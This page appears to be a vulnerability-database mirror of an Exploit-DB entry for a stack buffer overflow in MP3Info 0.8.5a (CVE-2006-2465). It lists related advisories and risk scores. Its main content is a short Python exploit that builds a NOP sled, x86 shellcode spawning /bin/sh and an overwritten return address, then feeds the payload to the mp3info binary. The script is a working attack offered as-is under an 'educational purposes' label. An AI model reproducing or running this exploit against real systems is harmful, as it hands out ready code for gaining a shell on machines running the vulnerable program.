Lucene search
+L

MP3Info 0.8.5a - Buffer Overflow

🗓️ 27 Jan 2014 00:00:00Reported by jsaccoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

MP3info 0.8.5a Stack-Buffer Overflow exploit for educational purposes, targeting the latest version

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
MP3Info 0.8.5a - SEH Buffer Overflow Exploit
19 Mar 201400:00
zdt
circl
Circl
CVE-2006-2465
27 Jan 201400:00
circl
cve
CVE
CVE-2006-2465
19 May 200610:00
cve
cvelist
Cvelist
CVE-2006-2465
19 May 200610:00
cvelist
debiancve
Debian CVE
CVE-2006-2465
19 May 200610:00
debiancve
exploitdb
Exploit DB
MP3Info 0.8.5a - Local Buffer Overflow (SEH)
19 Mar 201400:00
exploitdb
myhack58
myhack58
Linux vulnerability analysis-MP3Info 0.8.5 a code execution vulnerability, CVE-2006-2465-a vulnerability warning-the black bar safety net
5 Mar 201700:00
myhack58
nvd
NVD
CVE-2006-2465
19 May 200610:02
nvd
osv
OSV
DEBIAN-CVE-2006-2465
19 May 200610:02
osv
packetstorm
Packet Storm
MP3Info 0.8.5 SEH Buffer Overflow
19 Mar 201400:00
packetstorm
Rows per page
# Waste of CPU clock N2
# Exploit for: mp3info! Latest version
# Author: jsacco - [email protected]
# Vendor: http://ibiblio.org/mp3info/
# No-one-cares-about programs!

junk = "\x90\x90\x90\x90"*8
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
buffer = "\x90\x90\x90\x90"*89
eip = "\x10\xf0\xff\xbf"

print "# MP3info is prone to a Stack-BoF"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"

try:
    subprocess.call(["mp3info", junk+shellcode+buffer+eip])
except OSError as e:
    if e.errno == os.errno.ENOENT:
    	print "MP3Info not found!"
    else:
   	print "Error executing exploit"
    raise

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25.1
EPSS0.05387
27